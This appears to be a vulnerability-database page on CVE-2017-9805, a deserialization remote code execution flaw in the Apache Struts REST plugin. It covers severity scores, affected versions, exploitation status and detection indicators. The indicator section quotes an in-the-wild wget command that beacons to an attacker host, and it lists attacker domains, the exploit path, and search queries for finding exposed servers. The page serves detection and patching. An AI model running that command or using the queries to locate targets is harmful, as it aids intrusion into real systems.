cbcvebase.
CVE-2017-9805
published 2017-09-15

CVE-2017-9805: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for…

PriorityP196high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.46%
99.9th percentile
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.

Affected

9 ranges
VendorProductVersion rangeFixed in
apachestruts>= 2.1.2 < 2.3.342.3.34
apachestruts>= 2.5.0 < 2.5.132.5.13
apache_software_foundationapache_struts
ciscohosted_collaboration_solution
ciscohosted_collaboration_solution
ciscohosted_collaboration_solution
ciscohosted_collaboration_solution
ciscomedia_experience_engine
ciscomedia_experience_engine

Detection & IOCsextracted from sources · hover to see the quote

domainwildkind.ru
domainst2buzgajl.alifuzz.com
urlhttp://wildkind.ru:8082/?vulnerablesite
urlhxxp://st2buzgajl.alifuzz.com/052
path/struts2-rest-showcase/orders/3
port8082
command/bin/sh -c wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite
snort
SID 44315
  • Exploitation targets HTTP POST requests to the path /struts2-rest-showcase/orders/3 with Content-Type: application/xml, delivering a crafted XStream XML deserialization payload.
  • Nuclei template matcher looks for HTTP 500 response containing both 'Debugging information' and 'com.thoughtworks.xstream.converters.collections.MapConverter' in the body to confirm successful exploitation trigger.
  • Scanning activity is identified by outbound wget requests that include the compromised website name in the URL query parameter, writing output to /dev/null (no file drop), used purely to beacon vulnerable hosts back to attacker infrastructure.
  • Shodan and FOFA queries can be used to identify exposed Struts instances: search for 'apache struts' in HTML body, 'struts2 showcase' in title, or 'struts problem report' in body.
  • A significant portion of exploitation traffic originates from the IP associated with wildkind.ru (188.120.246.215); traffic from this IP to Struts REST endpoints should be treated as high-confidence exploitation.
  • ·The Tenable remote check plugin (102977) requires 'perform thorough tests' enabled and a Web Application Scan configured; it will NOT work from Tenable.io shared scanner pools due to the blind RCE nature of the vulnerability — on-premise scanners must be used.
  • ·The Tenable authenticated local check plugin (102960) only runs when the scan Accuracy setting is set to 'Show potential false alarms' and cannot detect if a workaround is in place that mitigates the vulnerability.
  • ·Snort rule 44315 was released at time of disclosure; additional rules may be released and current rules are subject to change pending additional vulnerability information — customers should keep SRU/rule packs updated.

CVSS provenance

nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.1HIGH
cisa8.1HIGH
vendor_redhat8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.